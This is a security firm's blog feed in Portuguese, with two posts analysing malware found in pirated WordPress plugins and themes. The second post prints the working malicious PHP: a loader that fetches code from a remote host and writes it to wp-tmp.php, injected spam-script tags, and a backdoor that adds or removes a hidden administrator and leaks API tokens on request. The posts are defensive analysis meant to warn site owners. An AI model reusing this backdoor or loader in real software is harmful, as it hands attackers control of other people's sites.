<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Arquivos plugin nulled - ETH SECURITY</title>
	<atom:link href="https://ethsecurity.com.br/tag/plugin-nulled/feed/" rel="self" type="application/rss+xml" />
	<link>https://ethsecurity.com.br/tag/plugin-nulled/</link>
	<description>Especialista em segurança de sites</description>
	<lastBuildDate>Fri, 25 Jul 2025 18:12:47 +0000</lastBuildDate>
	<language>pt-BR</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.8.3</generator>

<image>
	<url>https://ethsecurity.com.br/wp-content/uploads/2019/04/logo-150x150.jpg</url>
	<title>Arquivos plugin nulled - ETH SECURITY</title>
	<link>https://ethsecurity.com.br/tag/plugin-nulled/</link>
	<width>32</width>
	<height>32</height>
</image> 
<site xmlns="com-wordpress:feed-additions:1">161029545</site>	<item>
		<title>Plugins Piratas &#8211; Análise técnica</title>
		<link>https://ethsecurity.com.br/plugins-piratas-analise-tecnica/</link>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Fri, 25 Jul 2025 17:38:28 +0000</pubDate>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[remoção de malware]]></category>
		<category><![CDATA[Segurança na web]]></category>
		<category><![CDATA[Segurança wordpress]]></category>
		<category><![CDATA[plugin nulled]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[segurança de sites]]></category>
		<category><![CDATA[segurança web]]></category>
		<category><![CDATA[segurança wordpress]]></category>
		<guid isPermaLink="false">https://ethsecurity.com.br/?p=458</guid>

					<description><![CDATA[<p>Você ja se perguntou qual seria o perigo de instalar um plugin ou tema pirata em seu site? Será seguro? oque vai acontecer se eu usar? Para responder essas perguntas decidimos baixar um plugin pirata de um site que oferece os temas e plugins nulled, instalar em um ambiente controlado e ver as alterações e [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/plugins-piratas-analise-tecnica/">Plugins Piratas &#8211; Análise técnica</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Você ja se perguntou qual seria o perigo de instalar um plugin ou tema pirata em seu site? Será seguro? oque vai acontecer se eu usar?</p>
<p>Para responder essas perguntas decidimos baixar um plugin pirata de um site que oferece os temas e plugins nulled, instalar em um ambiente controlado e ver as alterações e quais os perigos que quem instala plugins e temas nulled estão correndo.</p>
<p>Baixamos o arquivo do plugin e antes mesmo de instalar realizamos um scan com assinturas comerciais do clamav e ja encontramos o primeiro problema:</p>
<p><a href="https://ethsecurity.com.br/plugins-piratas-analise-tecnica/scan/" rel="attachment wp-att-470"><img fetchpriority="high" decoding="async" class="aligncenter wp-image-470 size-full" src="https://ethsecurity.com.br/wp-content/uploads/2025/07/scan.png" alt="" width="925" height="268" srcset="https://ethsecurity.com.br/wp-content/uploads/2025/07/scan.png 925w, https://ethsecurity.com.br/wp-content/uploads/2025/07/scan-300x87.png 300w, https://ethsecurity.com.br/wp-content/uploads/2025/07/scan-700x203.png 700w, https://ethsecurity.com.br/wp-content/uploads/2025/07/scan-150x43.png 150w, https://ethsecurity.com.br/wp-content/uploads/2025/07/scan-768x223.png 768w" sizes="(max-width: 925px) 100vw, 925px" /></a></p>
<p>&nbsp;</p>
<p>A assinatura já nos da uma pista do malware que está nesse arquivo porém vamos analisar mais a fundo:</p>
<p><a href="https://ethsecurity.com.br/plugins-piratas-analise-tecnica/malware/" rel="attachment wp-att-471"><img decoding="async" class="aligncenter size-full wp-image-471" src="https://ethsecurity.com.br/wp-content/uploads/2025/07/malware.png" alt="" width="1855" height="271" srcset="https://ethsecurity.com.br/wp-content/uploads/2025/07/malware.png 1855w, https://ethsecurity.com.br/wp-content/uploads/2025/07/malware-300x44.png 300w, https://ethsecurity.com.br/wp-content/uploads/2025/07/malware-700x102.png 700w, https://ethsecurity.com.br/wp-content/uploads/2025/07/malware-150x22.png 150w, https://ethsecurity.com.br/wp-content/uploads/2025/07/malware-768x112.png 768w, https://ethsecurity.com.br/wp-content/uploads/2025/07/malware-1536x224.png 1536w" sizes="(max-width: 1855px) 100vw, 1855px" /></a></p>
<p>Em uma rápida analise o código acima faz:</p>
<ul>
<li>Cria um usuário administrador oculto com login fixo (default) e senha pré-definida.</li>
<li>Esconde esse usuário da listagem de administradores no painel WordPress, alterando queries e contadores.</li>
<li>Envia informações do site (URL e data) para um servidor externo (llllll.my).</li>
<li>Injeta código malicioso em arquivos sensíveis (footer.php, functions.php, formatting.php) de todos os temas.</li>
<li>Carrega código remoto de outro servidor (panel.hac&#8230;..) sempre que o site é acessado.</li>
<li>Desativa cache no site para garantir que os scripts maliciosos sempre sejam executados.</li>
<li>Se instala de forma persistente, dificultando a detecção e remoção.</li>
</ul>
<p>Então resolvemos instalar o plugin e analisar o comportamento.</p>
<p>&nbsp;</p>
<p>Após o pluign instalado o que olhamos primeiro é a tabela de usuários</p>
<p><a href="https://ethsecurity.com.br/plugins-piratas-analise-tecnica/admin-list/" rel="attachment wp-att-472"><img decoding="async" class="aligncenter wp-image-472 " src="https://ethsecurity.com.br/wp-content/uploads/2025/07/admin-list-700x383.png" alt="" width="541" height="296" srcset="https://ethsecurity.com.br/wp-content/uploads/2025/07/admin-list-700x383.png 700w, https://ethsecurity.com.br/wp-content/uploads/2025/07/admin-list-300x164.png 300w, https://ethsecurity.com.br/wp-content/uploads/2025/07/admin-list-150x82.png 150w, https://ethsecurity.com.br/wp-content/uploads/2025/07/admin-list-768x420.png 768w, https://ethsecurity.com.br/wp-content/uploads/2025/07/admin-list.png 951w" sizes="(max-width: 541px) 100vw, 541px" /></a></p>
<p>&nbsp;</p>
<p>Na tabela de usuários pelo wordpress não existe nenhum usuário maliciosos, mas se formos direto no banco de dados:</p>
<p><a href="https://ethsecurity.com.br/plugins-piratas-analise-tecnica/banco/" rel="attachment wp-att-473"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-473" src="https://ethsecurity.com.br/wp-content/uploads/2025/07/banco.png" alt="" width="1068" height="156" srcset="https://ethsecurity.com.br/wp-content/uploads/2025/07/banco.png 1068w, https://ethsecurity.com.br/wp-content/uploads/2025/07/banco-300x44.png 300w, https://ethsecurity.com.br/wp-content/uploads/2025/07/banco-700x102.png 700w, https://ethsecurity.com.br/wp-content/uploads/2025/07/banco-150x22.png 150w, https://ethsecurity.com.br/wp-content/uploads/2025/07/banco-768x112.png 768w" sizes="auto, (max-width: 1068px) 100vw, 1068px" /></a></p>
<p>&nbsp;</p>
<p>Isso acontece por causa desse trecho de código, que esconde o usuário no backend do wordpress:</p>
<p><a href="https://ethsecurity.com.br/plugins-piratas-analise-tecnica/script/" rel="attachment wp-att-474"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-474" src="https://ethsecurity.com.br/wp-content/uploads/2025/07/script.png" alt="" width="560" height="261" srcset="https://ethsecurity.com.br/wp-content/uploads/2025/07/script.png 560w, https://ethsecurity.com.br/wp-content/uploads/2025/07/script-300x140.png 300w, https://ethsecurity.com.br/wp-content/uploads/2025/07/script-150x70.png 150w" sizes="auto, (max-width: 560px) 100vw, 560px" /></a></p>
<p>Note que o código acima tem o usuário e a senha do user malicioso, o nível de acesso do usário e a opção para esconder o mesmo no admin bar, dificultando a vida de quem não possui um conhecimento mais técnico para remoção das infecções.</p>
<p>Seguindo em frente, o seguinte código foi adicionado no footer do tema, direcionando os visitantes para sites de spam, comprometendo o trafego do site, SEO e resultados de mecanismos de busca.</p>
<p><a href="https://ethsecurity.com.br/plugins-piratas-analise-tecnica/footer/" rel="attachment wp-att-475"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-475" src="https://ethsecurity.com.br/wp-content/uploads/2025/07/footer.png" alt="" width="1876" height="138" srcset="https://ethsecurity.com.br/wp-content/uploads/2025/07/footer.png 1876w, https://ethsecurity.com.br/wp-content/uploads/2025/07/footer-300x22.png 300w, https://ethsecurity.com.br/wp-content/uploads/2025/07/footer-700x51.png 700w, https://ethsecurity.com.br/wp-content/uploads/2025/07/footer-150x11.png 150w, https://ethsecurity.com.br/wp-content/uploads/2025/07/footer-768x56.png 768w, https://ethsecurity.com.br/wp-content/uploads/2025/07/footer-1536x113.png 1536w" sizes="auto, (max-width: 1876px) 100vw, 1876px" /></a></p>
<p>Por último o script envia os dados do site para um site terceiro, avisando que aquele site está sob controle do invasor:</p>
<p><a href="https://ethsecurity.com.br/plugins-piratas-analise-tecnica/outbound/" rel="attachment wp-att-476"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-476" src="https://ethsecurity.com.br/wp-content/uploads/2025/07/outbound.png" alt="" width="786" height="251" srcset="https://ethsecurity.com.br/wp-content/uploads/2025/07/outbound.png 786w, https://ethsecurity.com.br/wp-content/uploads/2025/07/outbound-300x96.png 300w, https://ethsecurity.com.br/wp-content/uploads/2025/07/outbound-700x224.png 700w, https://ethsecurity.com.br/wp-content/uploads/2025/07/outbound-150x48.png 150w, https://ethsecurity.com.br/wp-content/uploads/2025/07/outbound-768x245.png 768w" sizes="auto, (max-width: 786px) 100vw, 786px" /></a></p>
<p>&nbsp;</p>
<p>Com isso completa-se a análise, chegando a conclusão de que nunca se deve utilizar plugins ou temas de fontes duvidosas, além de você não ter suporte para aplicação você estará entregando seu site para terceiros realizarem envio de spam, ataques a outros hosts ou hospedagem de phishing.</p>
<p>&nbsp;</p>
<p>O post <a href="https://ethsecurity.com.br/plugins-piratas-analise-tecnica/">Plugins Piratas &#8211; Análise técnica</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">458</post-id>	</item>
		<item>
		<title>Por que não utilizar temas e plugins piratas.</title>
		<link>https://ethsecurity.com.br/por-que-nao-utilizar-temas-e-plugins-piratas/</link>
					<comments>https://ethsecurity.com.br/por-que-nao-utilizar-temas-e-plugins-piratas/#respond</comments>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Tue, 23 Apr 2019 12:36:32 +0000</pubDate>
				<category><![CDATA[Segurança na web]]></category>
		<category><![CDATA[plugin nulled]]></category>
		<category><![CDATA[plugin pirata]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[segurança]]></category>
		<category><![CDATA[segurança de sites]]></category>
		<category><![CDATA[segurança web]]></category>
		<category><![CDATA[segurança wordpress]]></category>
		<category><![CDATA[tema nulled]]></category>
		<category><![CDATA[tema pirata]]></category>
		<category><![CDATA[virus de site]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">https://www.ethsecurity.com.br/?p=209</guid>

					<description><![CDATA[<p>Infelizmente é muito comum hoje utilizar em CMS plugins e temas piratas, vários sites na internet disponibilizam esses materiais de maneira &#8220;gratuita&#8221;, porém o preço que cobram pode ser alto para seu conteúdo online, vamos a nossa análise. Realizamos o download de um tema pirata, fizemos a instalação em em ambiente controlado e após isso [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/por-que-nao-utilizar-temas-e-plugins-piratas/">Por que não utilizar temas e plugins piratas.</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Infelizmente é muito comum hoje utilizar em CMS plugins e temas piratas, vários sites na internet disponibilizam esses materiais de maneira &#8220;gratuita&#8221;, porém o preço que cobram pode ser alto para seu conteúdo online, vamos a nossa análise.</p>
<p>Realizamos o download de um tema pirata, fizemos a instalação em em ambiente controlado e após isso fizemos o nosso scan nos arquivos e encontramos códigos maliciosos injetados nos seguintes arquivos:</p>
<p>./wp-content/themes/twentynineteen/functions.php<br />
./wp-content/themes/twentyseventeen/functions.php<br />
./wp-content/themes/twentysixteen/functions.php<br />
./wp-includes/post.php<br />
./wp-includes/wp-tmp.php<br />
./wp-includes/wp-vcd.php</p>
<p>Começamos pelos arquivos functions.php e o conteúdo mostra que o mesmo é utilizado para infectar os demais:</p>
<p>elseif ($tmpcontent = @file_get_contents(&#8220;http://www. harors .pw/code .php&#8221;) AND stripos($tmpcontent, $wp_auth_key) !== false ) {</p>
<p>if (stripos($tmpcontent, $wp_auth_key) !== false) {<br />
extract(theme_temp_setup($tmpcontent));<br />
@file_put_contents(ABSPATH . &#8216;wp-includes/wp-tmp.php&#8217;, $tmpcontent);</p>
<p>if (!file_exists(ABSPATH . &#8216;wp-includes/wp-tmp.php&#8217;)) {<br />
@file_put_contents(get_template_directory() . &#8216;/wp-tmp.php&#8217;, $tmpcontent);<br />
if (!file_exists(get_template_directory() . &#8216;/wp-tmp.php&#8217;)) {<br />
@file_put_contents(&#8216;wp-tmp.php&#8217;, $tmpcontent);</p>
<p>verificando o conteúdo do arquivo wp-tmp.php o mesmo contém redirecionamentos para sites maliciosos:</p>
<p>&lt;script type=&#8221;text/javascript&#8221; src=&#8221;//deloplen .com/ apu.php?zoneid=2542869&#8243; async data-cfasync=&#8221;false&#8221;&gt;&lt;/script&gt;<br />
&lt;script src=&#8221;//pushqwer .com/ ntfc.php?p=2542872&#8243; data-cfasync=&#8221;false&#8221; async&gt;&lt;/script&gt;</p>
<p>Os links acima em seu site fará com que o mesmo seja marcado como malicioso no Google e outras ferramentas de pesquisa, ou seja, o site será marcado com a tela vermelha de alerta de conteúdo malicioso, imagine seu cliente acessando sua loja online e se deparando com o aviso &#8220;O site a seguir contém conteúdo malicioso ou enganoso&#8221;.</p>
<p>Em outras ocasiões o Google interrompe o AdSense e Adwords para aquele site, outro prejuízo para o proprietário do mesmo.</p>
<p>Analisando mais profundamente os scripts vimos que também foi criado o arquivo wp-includes/class-wp.php:</p>
<p>require $_SERVER[&#8216;DOCUMENT_ROOT&#8217;].&#8217;/wp-load.php&#8217;;<br />
$table_name = $wpdb-&gt;get_blog_prefix();<br />
$sample = &#8216;a:1:{s:13:&#8221;administrator&#8221;;b:1;}&#8217;;<br />
if( isset($_GET[&#8216;ok&#8217;]) ) { echo &#8216;&lt;!&#8211; Silence is golden. &#8211;&gt;&#8217;;}<br />
if( isset($_GET[&#8216;awu&#8217;]) ) {<br />
$wpdb-&gt;query(&#8220;INSERT INTO $wpdb-&gt;users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (&#8216;100010010&#8217;, &#8216;100010010&#8217;, &#8216;\$P\$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.&#8217;, &#8216;100010010&#8217;, &#8216;te@ea.st&#8217;, &#8221;, &#8216;2011-06-07 00:00:00&#8217;, &#8221;, &#8216;0&#8217;, &#8216;100010010&#8217;);&#8221;);<br />
$wpdb-&gt;query(&#8220;INSERT INTO $wpdb-&gt;usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (100010010, &#8216;100010010&#8217;, &#8216;{$table_name}capabilities&#8217;, &#8216;{$sample}&#8217;);&#8221;);<br />
$wpdb-&gt;query(&#8220;INSERT INTO $wpdb-&gt;usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, &#8216;100010010&#8217;, &#8216;{$table_name}user_level&#8217;, &#8217;10&#8217;);&#8221;); }<br />
if( isset($_GET[&#8216;dwu&#8217;]) ) { $wpdb-&gt;query(&#8220;DELETE FROM $wpdb-&gt;users WHERE `ID` = 100010010&#8221;);<br />
$wpdb-&gt;query(&#8220;DELETE FROM $wpdb-&gt;usermeta WHERE $wpdb-&gt;usermeta.`umeta_id` = 100010010&#8221;);}<br />
if( isset($_GET[&#8216;key&#8217;]) ) { $options = get_option( EWPT_PLUGIN_SLUG ); echo &#8216;&lt;center&gt;&lt;h2&gt;&#8217; . esc_attr( $options[&#8216;user_name&#8217;] . &#8216;:&#8217; . esc_attr( $options[&#8216;api_key&#8217;])) . &#8216;&lt;br&gt;&#8217;;<br />
echo esc_html( envato_market()-&gt;get_option( &#8216;token&#8217; ) ); echo &#8216;&lt;/center&gt;&lt;/h2&gt;&#8217;; }</p>
<p>Analisando o código chegamos a conclusão que se trata de um backdoor, veja o que o acontece ao acessar o arquivo pela url utilizando o final ?awu (add wordpress user):</p>
<p>| 100010010 | 100010010 | $P$BaRp7gFRTND5AwwJwpQY8EyN3otDiL. | 100010010 | te@ea.st | | 2011-06-07 00:00:00 | | 0 | 100010010 |</p>
<p>Conforme visto acima, foi adicionado um usuário WordPress com a propriedade de administrador na tabela wp_users no banco de dados, o que dará total controle do invasor ao site, depois de realizar as ações que quiser o usuário pode ser removido com o comando dwu (delete wordpress user) e podendo adicionar novamente quando desejar enquanto o arquivo estiver no site, ou seja, ele toamrá total controle do site sem que você saiba até um analista de segurança apurar os logs e descobrir essas ações ou o arquivo ser removido.</p>
<h3>Conclusão:</h3>
<p>Baixando plugins e temas piratas você estará inserindo um verdadeiro cavalo de Tróia em seu site, dando acesso a terceiros a todos os dados sensíveis, trazendo muito mais prejuízo do que adquirir um tema ou plugin de maneira lícita.</p>
<p>Além das vantagens de ter um site seguro, adquirindo um plugin ou tema pago de maneira correta você poderá contar com o suporte do desenvolvedor da aplicação em caso de problemas.</p>
<h1>Site infectado? Não consegue resolver?</h1>
<p>Entre em contato agora com nossa consultoria especializada através do link <a href="https://www.ethsecurity.com.br/remocao-de-malwares/">Remoção de Malware</a> em nosso site.</p>
<p>Dúvidas? Sugestões? Fiquem a vontade para se expressar nos comentários.</p>
<p>O post <a href="https://ethsecurity.com.br/por-que-nao-utilizar-temas-e-plugins-piratas/">Por que não utilizar temas e plugins piratas.</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ethsecurity.com.br/por-que-nao-utilizar-temas-e-plugins-piratas/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">209</post-id>	</item>
	</channel>
</rss>
